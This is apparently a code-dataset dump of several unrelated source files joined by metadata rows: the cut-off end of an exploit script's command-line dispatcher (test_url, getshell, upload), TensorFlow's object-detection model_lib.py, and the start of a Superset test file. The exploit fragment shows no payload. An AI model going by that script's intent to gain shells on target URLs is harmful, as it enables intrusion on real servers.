if options.shell == None and options.u != None:
test_url(options.u,options.v);
exit(0)
elif options.shell != None and options.u != None:
getshell(options.u)
elif options.shell != None and options.u != None:
upload(options.u,options.upload)
else:
print(parser.usage)
exit(0)
if __name__ == '__main__':
main()
| 42.43956 | 170 | 0.571207 |
ace75d99371662916c55c1be1d814d90e490314e | 34,842 | py | Python | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 79 | 2019-03-02T17:40:25.000Z | 2021-08-17T13:22:03.000Z | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 8 | 2019-05-14T10:10:50.000Z | 2020-12-20T14:05:29.000Z | research/object_detection/model_lib.py | slomrafgrav/models | daa6c0415e47bdc52ad6434dc2bdb5d8aeb4f7ce | [
"Apache-2.0"
] | 27 | 2019-02-04T01:45:48.000Z | 2021-03-18T02:39:28.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Constructs model, inputs, and training environment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import functools
import os
import tensorflow as tf
from object_detection import eval_util
from object_detection import exporter as exporter_lib
from object_detection import inputs
from object_detection.builders import graph_rewriter_builder
from object_detection.builders import model_builder
from object_detection.builders import optimizer_builder
from object_detection.core import standard_fields as fields
from object_detection.utils import config_util
from object_detection.utils import label_map_util
from object_detection.utils import shape_utils
from object_detection.utils import variables_helper
from object_detection.utils import visualization_utils as vis_utils
# A map of names to methods that help build the model.
MODEL_BUILD_UTIL_MAP = {
'get_configs_from_pipeline_file':
config_util.get_configs_from_pipeline_file,
'create_pipeline_proto_from_configs':
config_util.create_pipeline_proto_from_configs,
'merge_external_params_with_configs':
config_util.merge_external_params_with_configs,
'create_train_input_fn':
inputs.create_train_input_fn,
'create_eval_input_fn':
inputs.create_eval_input_fn,
'create_predict_input_fn':
inputs.create_predict_input_fn,
}
def _prepare_groundtruth_for_eval(detection_model, class_agnostic,
max_number_of_boxes):
"""Extracts groundtruth data from detection_model and prepares it for eval.
Args:
detection_model: A `DetectionModel` object.
class_agnostic: Whether the detections are class_agnostic.
max_number_of_boxes: Max number of groundtruth boxes.
Returns:
A tuple of:
groundtruth: Dictionary with the following fields:
'groundtruth_boxes': [batch_size, num_boxes, 4] float32 tensor of boxes,
in normalized coordinates.
'groundtruth_classes': [batch_size, num_boxes] int64 tensor of 1-indexed
classes.
'groundtruth_masks': 4D float32 tensor of instance masks (if provided in
groundtruth)
'groundtruth_is_crowd': [batch_size, num_boxes] bool tensor indicating
is_crowd annotations (if provided in groundtruth).
'num_groundtruth_boxes': [batch_size] tensor containing the maximum number
of groundtruth boxes per image..
class_agnostic: Boolean indicating whether detections are class agnostic.
"""
input_data_fields = fields.InputDataFields()
groundtruth_boxes = tf.stack(
detection_model.groundtruth_lists(fields.BoxListFields.boxes))
groundtruth_boxes_shape = tf.shape(groundtruth_boxes)
# For class-agnostic models, groundtruth one-hot encodings collapse to all
# ones.
if class_agnostic:
groundtruth_classes_one_hot = tf.ones(
[groundtruth_boxes_shape[0], groundtruth_boxes_shape[1], 1])
else:
groundtruth_classes_one_hot = tf.stack(
detection_model.groundtruth_lists(fields.BoxListFields.classes))
label_id_offset = 1 # Applying label id offset (b/63711816)
groundtruth_classes = (
tf.argmax(groundtruth_classes_one_hot, axis=2) + label_id_offset)
groundtruth = {
input_data_fields.groundtruth_boxes: groundtruth_boxes,
input_data_fields.groundtruth_classes: groundtruth_classes
}
if detection_model.groundtruth_has_field(fields.BoxListFields.masks):
groundtruth[input_data_fields.groundtruth_instance_masks] = tf.stack(
detection_model.groundtruth_lists(fields.BoxListFields.masks))
if detection_model.groundtruth_has_field(fields.BoxListFields.is_crowd):
groundtruth[input_data_fields.groundtruth_is_crowd] = tf.stack(
detection_model.groundtruth_lists(fields.BoxListFields.is_crowd))
groundtruth[input_data_fields.num_groundtruth_boxes] = (
tf.tile([max_number_of_boxes], multiples=[groundtruth_boxes_shape[0]]))
return groundtruth
def unstack_batch(tensor_dict, unpad_groundtruth_tensors=True):
"""Unstacks all tensors in `tensor_dict` along 0th dimension.
Unstacks tensor from the tensor dict along 0th dimension and returns a
tensor_dict containing values that are lists of unstacked, unpadded tensors.
Tensors in the `tensor_dict` are expected to be of one of the three shapes:
1. [batch_size]
2. [batch_size, height, width, channels]
3. [batch_size, num_boxes, d1, d2, ... dn]
When unpad_groundtruth_tensors is set to true, unstacked tensors of form 3
above are sliced along the `num_boxes` dimension using the value in tensor
field.InputDataFields.num_groundtruth_boxes.
Note that this function has a static list of input data fields and has to be
kept in sync with the InputDataFields defined in core/standard_fields.py
Args:
tensor_dict: A dictionary of batched groundtruth tensors.
unpad_groundtruth_tensors: Whether to remove padding along `num_boxes`
dimension of the groundtruth tensors.
Returns:
A dictionary where the keys are from fields.InputDataFields and values are
a list of unstacked (optionally unpadded) tensors.
Raises:
ValueError: If unpad_tensors is True and `tensor_dict` does not contain
`num_groundtruth_boxes` tensor.
"""
unbatched_tensor_dict = {
key: tf.unstack(tensor) for key, tensor in tensor_dict.items()
}
if unpad_groundtruth_tensors:
if (fields.InputDataFields.num_groundtruth_boxes not in
unbatched_tensor_dict):
raise ValueError('`num_groundtruth_boxes` not found in tensor_dict. '
'Keys available: {}'.format(
unbatched_tensor_dict.keys()))
unbatched_unpadded_tensor_dict = {}
unpad_keys = set([
# List of input data fields that are padded along the num_boxes
# dimension. This list has to be kept in sync with InputDataFields in
# standard_fields.py.
fields.InputDataFields.groundtruth_instance_masks,
fields.InputDataFields.groundtruth_classes,
fields.InputDataFields.groundtruth_boxes,
fields.InputDataFields.groundtruth_keypoints,
fields.InputDataFields.groundtruth_group_of,
fields.InputDataFields.groundtruth_difficult,
fields.InputDataFields.groundtruth_is_crowd,
fields.InputDataFields.groundtruth_area,
fields.InputDataFields.groundtruth_weights
]).intersection(set(unbatched_tensor_dict.keys()))
for key in unpad_keys:
unpadded_tensor_list = []
for num_gt, padded_tensor in zip(
unbatched_tensor_dict[fields.InputDataFields.num_groundtruth_boxes],
unbatched_tensor_dict[key]):
tensor_shape = shape_utils.combined_static_and_dynamic_shape(
padded_tensor)
slice_begin = tf.zeros([len(tensor_shape)], dtype=tf.int32)
slice_size = tf.stack(
[num_gt] + [-1 if dim is None else dim for dim in tensor_shape[1:]])
unpadded_tensor = tf.slice(padded_tensor, slice_begin, slice_size)
unpadded_tensor_list.append(unpadded_tensor)
unbatched_unpadded_tensor_dict[key] = unpadded_tensor_list
unbatched_tensor_dict.update(unbatched_unpadded_tensor_dict)
return unbatched_tensor_dict
def create_model_fn(detection_model_fn, configs, hparams, use_tpu=False):
"""Creates a model function for `Estimator`.
Args:
detection_model_fn: Function that returns a `DetectionModel` instance.
configs: Dictionary of pipeline config objects.
hparams: `HParams` object.
use_tpu: Boolean indicating whether model should be constructed for
use on TPU.
Returns:
`model_fn` for `Estimator`.
"""
train_config = configs['train_config']
eval_input_config = configs['eval_input_config']
eval_config = configs['eval_config']
def model_fn(features, labels, mode, params=None):
"""Constructs the object detection model.
Args:
features: Dictionary of feature tensors, returned from `input_fn`.
labels: Dictionary of groundtruth tensors if mode is TRAIN or EVAL,
otherwise None.
mode: Mode key from tf.estimator.ModeKeys.
params: Parameter dictionary passed from the estimator.
Returns:
An `EstimatorSpec` that encapsulates the model and its serving
configurations.
"""
params = params or {}
total_loss, train_op, detections, export_outputs = None, None, None, None
is_training = mode == tf.estimator.ModeKeys.TRAIN
# Make sure to set the Keras learning phase. True during training,
# False for inference.
tf.keras.backend.set_learning_phase(is_training)
detection_model = detection_model_fn(
is_training=is_training, add_summaries=(not use_tpu))
scaffold_fn = None
if mode == tf.estimator.ModeKeys.TRAIN:
labels = unstack_batch(
labels,
unpad_groundtruth_tensors=train_config.unpad_groundtruth_tensors)
elif mode == tf.estimator.ModeKeys.EVAL:
# For evaling on train data, it is necessary to check whether groundtruth
# must be unpadded.
boxes_shape = (
labels[fields.InputDataFields.groundtruth_boxes].get_shape()
.as_list())
unpad_groundtruth_tensors = boxes_shape[1] is not None and not use_tpu
labels = unstack_batch(
labels, unpad_groundtruth_tensors=unpad_groundtruth_tensors)
if mode in (tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL):
gt_boxes_list = labels[fields.InputDataFields.groundtruth_boxes]
gt_classes_list = labels[fields.InputDataFields.groundtruth_classes]
gt_masks_list = None
if fields.InputDataFields.groundtruth_instance_masks in labels:
gt_masks_list = labels[
fields.InputDataFields.groundtruth_instance_masks]
gt_keypoints_list = None
if fields.InputDataFields.groundtruth_keypoints in labels:
gt_keypoints_list = labels[fields.InputDataFields.groundtruth_keypoints]
gt_weights_list = None
if fields.InputDataFields.groundtruth_weights in labels:
gt_weights_list = labels[fields.InputDataFields.groundtruth_weights]
gt_confidences_list = None
if fields.InputDataFields.groundtruth_confidences in labels:
gt_confidences_list = labels[
fields.InputDataFields.groundtruth_confidences]
gt_is_crowd_list = None
if fields.InputDataFields.groundtruth_is_crowd in labels:
gt_is_crowd_list = labels[fields.InputDataFields.groundtruth_is_crowd]
detection_model.provide_groundtruth(
groundtruth_boxes_list=gt_boxes_list,
groundtruth_classes_list=gt_classes_list,
groundtruth_confidences_list=gt_confidences_list,
groundtruth_masks_list=gt_masks_list,
groundtruth_keypoints_list=gt_keypoints_list,
groundtruth_weights_list=gt_weights_list,
groundtruth_is_crowd_list=gt_is_crowd_list)
preprocessed_images = features[fields.InputDataFields.image]
if use_tpu and train_config.use_bfloat16:
with tf.contrib.tpu.bfloat16_scope():
prediction_dict = detection_model.predict(
preprocessed_images,
features[fields.InputDataFields.true_image_shape])
for k, v in prediction_dict.items():
if v.dtype == tf.bfloat16:
prediction_dict[k] = tf.cast(v, tf.float32)
else:
prediction_dict = detection_model.predict(
preprocessed_images,
features[fields.InputDataFields.true_image_shape])
if mode in (tf.estimator.ModeKeys.EVAL, tf.estimator.ModeKeys.PREDICT):
detections = detection_model.postprocess(
prediction_dict, features[fields.InputDataFields.true_image_shape])
if mode == tf.estimator.ModeKeys.TRAIN:
if train_config.fine_tune_checkpoint and hparams.load_pretrained:
if not train_config.fine_tune_checkpoint_type:
# train_config.from_detection_checkpoint field is deprecated. For
# backward compatibility, set train_config.fine_tune_checkpoint_type
# based on train_config.from_detection_checkpoint.
if train_config.from_detection_checkpoint:
train_config.fine_tune_checkpoint_type = 'detection'
else:
train_config.fine_tune_checkpoint_type = 'classification'
asg_map = detection_model.restore_map(
fine_tune_checkpoint_type=train_config.fine_tune_checkpoint_type,
load_all_detection_checkpoint_vars=(
train_config.load_all_detection_checkpoint_vars))
available_var_map = (
variables_helper.get_variables_available_in_checkpoint(
asg_map,
train_config.fine_tune_checkpoint,
include_global_step=False))
if use_tpu:
def tpu_scaffold():
tf.train.init_from_checkpoint(train_config.fine_tune_checkpoint,
available_var_map)
return tf.train.Scaffold()
scaffold_fn = tpu_scaffold
else:
tf.train.init_from_checkpoint(train_config.fine_tune_checkpoint,
available_var_map)
if mode in (tf.estimator.ModeKeys.TRAIN, tf.estimator.ModeKeys.EVAL):
losses_dict = detection_model.loss(
prediction_dict, features[fields.InputDataFields.true_image_shape])
losses = [loss_tensor for loss_tensor in losses_dict.values()]
if train_config.add_regularization_loss:
regularization_losses = detection_model.regularization_losses()
if regularization_losses:
regularization_loss = tf.add_n(
regularization_losses, name='regularization_loss')
losses.append(regularization_loss)
losses_dict['Loss/regularization_loss'] = regularization_loss
total_loss = tf.add_n(losses, name='total_loss')
losses_dict['Loss/total_loss'] = total_loss
if 'graph_rewriter_config' in configs:
graph_rewriter_fn = graph_rewriter_builder.build(
configs['graph_rewriter_config'], is_training=is_training)
graph_rewriter_fn()
# TODO(rathodv): Stop creating optimizer summary vars in EVAL mode once we
# can write learning rate summaries on TPU without host calls.
global_step = tf.train.get_or_create_global_step()
training_optimizer, optimizer_summary_vars = optimizer_builder.build(
train_config.optimizer)
if mode == tf.estimator.ModeKeys.TRAIN:
if use_tpu:
training_optimizer = tf.contrib.tpu.CrossShardOptimizer(
training_optimizer)
# Optionally freeze some layers by setting their gradients to be zero.
trainable_variables = None
include_variables = (
train_config.update_trainable_variables
if train_config.update_trainable_variables else None)
exclude_variables = (
train_config.freeze_variables
if train_config.freeze_variables else None)
trainable_variables = tf.contrib.framework.filter_variables(
tf.trainable_variables(),
include_patterns=include_variables,
exclude_patterns=exclude_variables)
clip_gradients_value = None
if train_config.gradient_clipping_by_norm > 0:
clip_gradients_value = train_config.gradient_clipping_by_norm
if not use_tpu:
for var in optimizer_summary_vars:
tf.summary.scalar(var.op.name, var)
summaries = [] if use_tpu else None
if train_config.summarize_gradients:
summaries = ['gradients', 'gradient_norm', 'global_gradient_norm']
train_op = tf.contrib.layers.optimize_loss(
loss=total_loss,
global_step=global_step,
learning_rate=None,
clip_gradients=clip_gradients_value,
optimizer=training_optimizer,
update_ops=detection_model.updates(),
variables=trainable_variables,
summaries=summaries,
name='') # Preventing scope prefix on all variables.
if mode == tf.estimator.ModeKeys.PREDICT:
exported_output = exporter_lib.add_output_tensor_nodes(detections)
export_outputs = {
tf.saved_model.signature_constants.PREDICT_METHOD_NAME:
tf.estimator.export.PredictOutput(exported_output)
}
eval_metric_ops = None
scaffold = None
if mode == tf.estimator.ModeKeys.EVAL:
class_agnostic = (
fields.DetectionResultFields.detection_classes not in detections)
groundtruth = _prepare_groundtruth_for_eval(
detection_model, class_agnostic,
eval_input_config.max_number_of_boxes)
use_original_images = fields.InputDataFields.original_image in features
if use_original_images:
eval_images = features[fields.InputDataFields.original_image]
true_image_shapes = tf.slice(
features[fields.InputDataFields.true_image_shape], [0, 0], [-1, 3])
original_image_spatial_shapes = features[fields.InputDataFields
.original_image_spatial_shape]
else:
eval_images = features[fields.InputDataFields.image]
true_image_shapes = None
original_image_spatial_shapes = None
eval_dict = eval_util.result_dict_for_batched_example(
eval_images,
features[inputs.HASH_KEY],
detections,
groundtruth,
class_agnostic=class_agnostic,
scale_to_absolute=True,
original_image_spatial_shapes=original_image_spatial_shapes,
true_image_shapes=true_image_shapes)
if class_agnostic:
category_index = label_map_util.create_class_agnostic_category_index()
else:
category_index = label_map_util.create_category_index_from_labelmap(
eval_input_config.label_map_path)
vis_metric_ops = None
if not use_tpu and use_original_images:
eval_metric_op_vis = vis_utils.VisualizeSingleFrameDetections(
category_index,
max_examples_to_draw=eval_config.num_visualizations,
max_boxes_to_draw=eval_config.max_num_boxes_to_visualize,
min_score_thresh=eval_config.min_score_threshold,
use_normalized_coordinates=False)
vis_metric_ops = eval_metric_op_vis.get_estimator_eval_metric_ops(
eval_dict)
# Eval metrics on a single example.
eval_metric_ops = eval_util.get_eval_metric_ops_for_evaluators(
eval_config, list(category_index.values()), eval_dict)
for loss_key, loss_tensor in iter(losses_dict.items()):
eval_metric_ops[loss_key] = tf.metrics.mean(loss_tensor)
for var in optimizer_summary_vars:
eval_metric_ops[var.op.name] = (var, tf.no_op())
if vis_metric_ops is not None:
eval_metric_ops.update(vis_metric_ops)
eval_metric_ops = {str(k): v for k, v in eval_metric_ops.items()}
if eval_config.use_moving_averages:
variable_averages = tf.train.ExponentialMovingAverage(0.0)
variables_to_restore = variable_averages.variables_to_restore()
keep_checkpoint_every_n_hours = (
train_config.keep_checkpoint_every_n_hours)
saver = tf.train.Saver(
variables_to_restore,
keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours)
scaffold = tf.train.Scaffold(saver=saver)
# EVAL executes on CPU, so use regular non-TPU EstimatorSpec.
if use_tpu and mode != tf.estimator.ModeKeys.EVAL:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
scaffold_fn=scaffold_fn,
predictions=detections,
loss=total_loss,
train_op=train_op,
eval_metrics=eval_metric_ops,
export_outputs=export_outputs)
else:
if scaffold is None:
keep_checkpoint_every_n_hours = (
train_config.keep_checkpoint_every_n_hours)
saver = tf.train.Saver(
sharded=True,
keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours,
save_relative_paths=True)
tf.add_to_collection(tf.GraphKeys.SAVERS, saver)
scaffold = tf.train.Scaffold(saver=saver)
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=detections,
loss=total_loss,
train_op=train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=export_outputs,
scaffold=scaffold)
return model_fn
def create_estimator_and_inputs(run_config,
hparams,
pipeline_config_path,
config_override=None,
train_steps=None,
sample_1_of_n_eval_examples=1,
sample_1_of_n_eval_on_train_examples=1,
model_fn_creator=create_model_fn,
use_tpu_estimator=False,
use_tpu=False,
num_shards=1,
params=None,
override_eval_num_epochs=True,
save_final_config=False,
**kwargs):
"""Creates `Estimator`, input functions, and steps.
Args:
run_config: A `RunConfig`.
hparams: A `HParams`.
pipeline_config_path: A path to a pipeline config file.
config_override: A pipeline_pb2.TrainEvalPipelineConfig text proto to
override the config from `pipeline_config_path`.
train_steps: Number of training steps. If None, the number of training steps
is set from the `TrainConfig` proto.
sample_1_of_n_eval_examples: Integer representing how often an eval example
should be sampled. If 1, will sample all examples.
sample_1_of_n_eval_on_train_examples: Similar to
`sample_1_of_n_eval_examples`, except controls the sampling of training
data for evaluation.
model_fn_creator: A function that creates a `model_fn` for `Estimator`.
Follows the signature:
* Args:
* `detection_model_fn`: Function that returns `DetectionModel` instance.
* `configs`: Dictionary of pipeline config objects.
* `hparams`: `HParams` object.
* Returns:
`model_fn` for `Estimator`.
use_tpu_estimator: Whether a `TPUEstimator` should be returned. If False,
an `Estimator` will be returned.
use_tpu: Boolean, whether training and evaluation should run on TPU. Only
used if `use_tpu_estimator` is True.
num_shards: Number of shards (TPU cores). Only used if `use_tpu_estimator`
is True.
params: Parameter dictionary passed from the estimator. Only used if
`use_tpu_estimator` is True.
override_eval_num_epochs: Whether to overwrite the number of epochs to
1 for eval_input.
save_final_config: Whether to save final config (obtained after applying
overrides) to `estimator.model_dir`.
**kwargs: Additional keyword arguments for configuration override.
Returns:
A dictionary with the following fields:
'estimator': An `Estimator` or `TPUEstimator`.
'train_input_fn': A training input function.
'eval_input_fns': A list of all evaluation input functions.
'eval_input_names': A list of names for each evaluation input.
'eval_on_train_input_fn': An evaluation-on-train input function.
'predict_input_fn': A prediction input function.
'train_steps': Number of training steps. Either directly from input or from
configuration.
"""
get_configs_from_pipeline_file = MODEL_BUILD_UTIL_MAP[
'get_configs_from_pipeline_file']
merge_external_params_with_configs = MODEL_BUILD_UTIL_MAP[
'merge_external_params_with_configs']
create_pipeline_proto_from_configs = MODEL_BUILD_UTIL_MAP[
'create_pipeline_proto_from_configs']
create_train_input_fn = MODEL_BUILD_UTIL_MAP['create_train_input_fn']
create_eval_input_fn = MODEL_BUILD_UTIL_MAP['create_eval_input_fn']
create_predict_input_fn = MODEL_BUILD_UTIL_MAP['create_predict_input_fn']
configs = get_configs_from_pipeline_file(pipeline_config_path,
config_override=config_override)
kwargs.update({
'train_steps': train_steps,
'sample_1_of_n_eval_examples': sample_1_of_n_eval_examples
})
if override_eval_num_epochs:
kwargs.update({'eval_num_epochs': 1})
tf.logging.warning(
'Forced number of epochs for all eval validations to be 1.')
configs = merge_external_params_with_configs(
configs, hparams, kwargs_dict=kwargs)
model_config = configs['model']
train_config = configs['train_config']
train_input_config = configs['train_input_config']
eval_config = configs['eval_config']
eval_input_configs = configs['eval_input_configs']
eval_on_train_input_config = copy.deepcopy(train_input_config)
eval_on_train_input_config.sample_1_of_n_examples = (
sample_1_of_n_eval_on_train_examples)
if override_eval_num_epochs and eval_on_train_input_config.num_epochs != 1:
tf.logging.warning('Expected number of evaluation epochs is 1, but '
'instead encountered `eval_on_train_input_config'
'.num_epochs` = '
'{}. Overwriting `num_epochs` to 1.'.format(
eval_on_train_input_config.num_epochs))
eval_on_train_input_config.num_epochs = 1
# update train_steps from config but only when non-zero value is provided
if train_steps is None and train_config.num_steps != 0:
train_steps = train_config.num_steps
detection_model_fn = functools.partial(
model_builder.build, model_config=model_config)
# Create the input functions for TRAIN/EVAL/PREDICT.
train_input_fn = create_train_input_fn(
train_config=train_config,
train_input_config=train_input_config,
model_config=model_config)
eval_input_fns = [
create_eval_input_fn(
eval_config=eval_config,
eval_input_config=eval_input_config,
model_config=model_config) for eval_input_config in eval_input_configs
]
eval_input_names = [
eval_input_config.name for eval_input_config in eval_input_configs
]
eval_on_train_input_fn = create_eval_input_fn(
eval_config=eval_config,
eval_input_config=eval_on_train_input_config,
model_config=model_config)
predict_input_fn = create_predict_input_fn(
model_config=model_config, predict_input_config=eval_input_configs[0])
export_to_tpu = hparams.get('export_to_tpu', False)
tf.logging.info('create_estimator_and_inputs: use_tpu %s, export_to_tpu %s',
use_tpu, export_to_tpu)
model_fn = model_fn_creator(detection_model_fn, configs, hparams, use_tpu)
if use_tpu_estimator:
estimator = tf.contrib.tpu.TPUEstimator(
model_fn=model_fn,
train_batch_size=train_config.batch_size,
# For each core, only batch size 1 is supported for eval.
eval_batch_size=num_shards * 1 if use_tpu else 1,
use_tpu=use_tpu,
config=run_config,
# TODO(lzc): Remove conditional after CMLE moves to TF 1.9
params=params if params else {})
else:
estimator = tf.estimator.Estimator(model_fn=model_fn, config=run_config)
# Write the as-run pipeline config to disk.
if run_config.is_chief and save_final_config:
pipeline_config_final = create_pipeline_proto_from_configs(configs)
config_util.save_pipeline_config(pipeline_config_final, estimator.model_dir)
return dict(
estimator=estimator,
train_input_fn=train_input_fn,
eval_input_fns=eval_input_fns,
eval_input_names=eval_input_names,
eval_on_train_input_fn=eval_on_train_input_fn,
predict_input_fn=predict_input_fn,
train_steps=train_steps)
def create_train_and_eval_specs(train_input_fn,
eval_input_fns,
eval_on_train_input_fn,
predict_input_fn,
train_steps,
eval_on_train_data=False,
final_exporter_name='Servo',
eval_spec_names=None):
"""Creates a `TrainSpec` and `EvalSpec`s.
Args:
train_input_fn: Function that produces features and labels on train data.
eval_input_fns: A list of functions that produce features and labels on eval
data.
eval_on_train_input_fn: Function that produces features and labels for
evaluation on train data.
predict_input_fn: Function that produces features for inference.
train_steps: Number of training steps.
eval_on_train_data: Whether to evaluate model on training data. Default is
False.
final_exporter_name: String name given to `FinalExporter`.
eval_spec_names: A list of string names for each `EvalSpec`.
Returns:
Tuple of `TrainSpec` and list of `EvalSpecs`. If `eval_on_train_data` is
True, the last `EvalSpec` in the list will correspond to training data. The
rest EvalSpecs in the list are evaluation datas.
"""
train_spec = tf.estimator.TrainSpec(
input_fn=train_input_fn, max_steps=train_steps)
if eval_spec_names is None:
eval_spec_names = [str(i) for i in range(len(eval_input_fns))]
eval_specs = []
for index, (eval_spec_name, eval_input_fn) in enumerate(
zip(eval_spec_names, eval_input_fns)):
# Uses final_exporter_name as exporter_name for the first eval spec for
# backward compatibility.
if index == 0:
exporter_name = final_exporter_name
else:
exporter_name = '{}_{}'.format(final_exporter_name, eval_spec_name)
exporter = tf.estimator.FinalExporter(
name=exporter_name, serving_input_receiver_fn=predict_input_fn)
eval_specs.append(
tf.estimator.EvalSpec(
name=eval_spec_name,
input_fn=eval_input_fn,
steps=None,
exporters=exporter))
if eval_on_train_data:
eval_specs.append(
tf.estimator.EvalSpec(
name='eval_on_train', input_fn=eval_on_train_input_fn, steps=None))
return train_spec, eval_specs
def continuous_eval(estimator, model_dir, input_fn, train_steps, name):
"""Perform continuous evaluation on checkpoints written to a model directory.
Args:
estimator: Estimator object to use for evaluation.
model_dir: Model directory to read checkpoints for continuous evaluation.
input_fn: Input function to use for evaluation.
train_steps: Number of training steps. This is used to infer the last
checkpoint and stop evaluation loop.
name: Namescope for eval summary.
"""
def terminate_eval():
tf.logging.info('Terminating eval after 180 seconds of no checkpoints')
return True
for ckpt in tf.contrib.training.checkpoints_iterator(
model_dir, min_interval_secs=180, timeout=None,
timeout_fn=terminate_eval):
tf.logging.info('Starting Evaluation.')
try:
eval_results = estimator.evaluate(
input_fn=input_fn, steps=None, checkpoint_path=ckpt, name=name)
tf.logging.info('Eval results: %s' % eval_results)
# Terminate eval job when final checkpoint is reached
current_step = int(os.path.basename(ckpt).split('-')[1])
if current_step >= train_steps:
tf.logging.info(
'Evaluation finished after training step %d' % current_step)
break
except tf.errors.NotFoundError:
tf.logging.info(
'Checkpoint %s no longer exists, skipping checkpoint' % ckpt)
def populate_experiment(run_config,
hparams,
pipeline_config_path,
train_steps=None,
eval_steps=None,
model_fn_creator=create_model_fn,
**kwargs):
"""Populates an `Experiment` object.
EXPERIMENT CLASS IS DEPRECATED. Please switch to
tf.estimator.train_and_evaluate. As an example, see model_main.py.
Args:
run_config: A `RunConfig`.
hparams: A `HParams`.
pipeline_config_path: A path to a pipeline config file.
train_steps: Number of training steps. If None, the number of training steps
is set from the `TrainConfig` proto.
eval_steps: Number of evaluation steps per evaluation cycle. If None, the
number of evaluation steps is set from the `EvalConfig` proto.
model_fn_creator: A function that creates a `model_fn` for `Estimator`.
Follows the signature:
* Args:
* `detection_model_fn`: Function that returns `DetectionModel` instance.
* `configs`: Dictionary of pipeline config objects.
* `hparams`: `HParams` object.
* Returns:
`model_fn` for `Estimator`.
**kwargs: Additional keyword arguments for configuration override.
Returns:
An `Experiment` that defines all aspects of training, evaluation, and
export.
"""
tf.logging.warning('Experiment is being deprecated. Please use '
'tf.estimator.train_and_evaluate(). See model_main.py for '
'an example.')
train_and_eval_dict = create_estimator_and_inputs(
run_config,
hparams,
pipeline_config_path,
train_steps=train_steps,
eval_steps=eval_steps,
model_fn_creator=model_fn_creator,
save_final_config=True,
**kwargs)
estimator = train_and_eval_dict['estimator']
train_input_fn = train_and_eval_dict['train_input_fn']
eval_input_fns = train_and_eval_dict['eval_input_fns']
predict_input_fn = train_and_eval_dict['predict_input_fn']
train_steps = train_and_eval_dict['train_steps']
export_strategies = [
tf.contrib.learn.utils.saved_model_export_utils.make_export_strategy(
serving_input_fn=predict_input_fn)
]
return tf.contrib.learn.Experiment(
estimator=estimator,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fns[0],
train_steps=train_steps,
eval_steps=None,
export_strategies=export_strategies,
eval_delay_secs=120,
)
| 42.542125 | 80 | 0.709402 |
ace75da35a88fa7131185ac9f819e0035667cfa8 | 23,482 | py | Python | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | 1 | 2022-02-10T09:11:41.000Z | 2022-02-10T09:11:41.000Z | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | null | null | null | tests/integration_tests/model_tests.py | ronna/superset | 95b28fc1346939017f8f6d867abeb12c7704d846 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# isort:skip_file
import json
import textwrap
import unittest
from unittest import mock
from superset import security_manager
from superset.connectors.sqla.models import SqlaTable
from superset.exceptions import SupersetException
from superset.utils.core import override_user
from tests.integration_tests.fixtures.birth_names_dashboard import (
load_birth_names_dashboard_with_slices,
load_birth_names_data,
)
import pytest
from sqlalchemy.engine.url import make_url
from sqlalchemy.types import DateTime
import tests.integration_tests.test_app
from superset import app, db as metadata_db
from superset.db_engine_specs.postgres import PostgresEngineSpec
from superset.common.db_query_status import QueryStatus
from superset.models.core import Database
from superset.models.slice import Slice
from superset.utils.database import get_example_database
from .base_tests import SupersetTestCase
from .fixtures.energy_dashboard import (
load_energy_table_with_slice,
load_energy_table_data,
)
class TestDatabaseModel(SupersetTestCase):
@unittest.skipUnless(
SupersetTestCase.is_module_installed("requests"), "requests not installed"
)
def test_database_schema_presto(self):
sqlalchemy_uri = "presto://presto.airbnb.io:8080/hive/default"
model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
db = make_url(model.get_sqla_engine().url).database
self.assertEqual("hive/default", db)
db = make_url(model.get_sqla_engine(schema="core_db").url).database
self.assertEqual("hive/core_db", db)
sqlalchemy_uri = "presto://presto.airbnb.io:8080/hive"
model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
db = make_url(model.get_sqla_engine().url).database
self.assertEqual("hive", db)
db = make_url(model.get_sqla_engine(schema="core_db").url).database
self.assertEqual("hive/core_db", db)
def test_database_schema_postgres(self):
sqlalchemy_uri = "postgresql+psycopg2://postgres.airbnb.io:5439/prod"
model = Database(database_name="test_database", sqlalchemy_uri=sqlalchemy_uri)
db = make_url(model.get_sqla_engine().url).database
self.assertEqual("prod", db)
db = make_url(model.get_sqla_engine(schema="foo").url).database
self.assertEqual("prod", db)
@unittest.skipUnless(
SupersetTestCase.is_module_installed("thrift"), "thrift not installed"
)
@unittest.skipUnless(
SupersetTestCase.is_module_installed("pyhive"), "pyhive not installed"
)
def test_database_schema_hive(self):
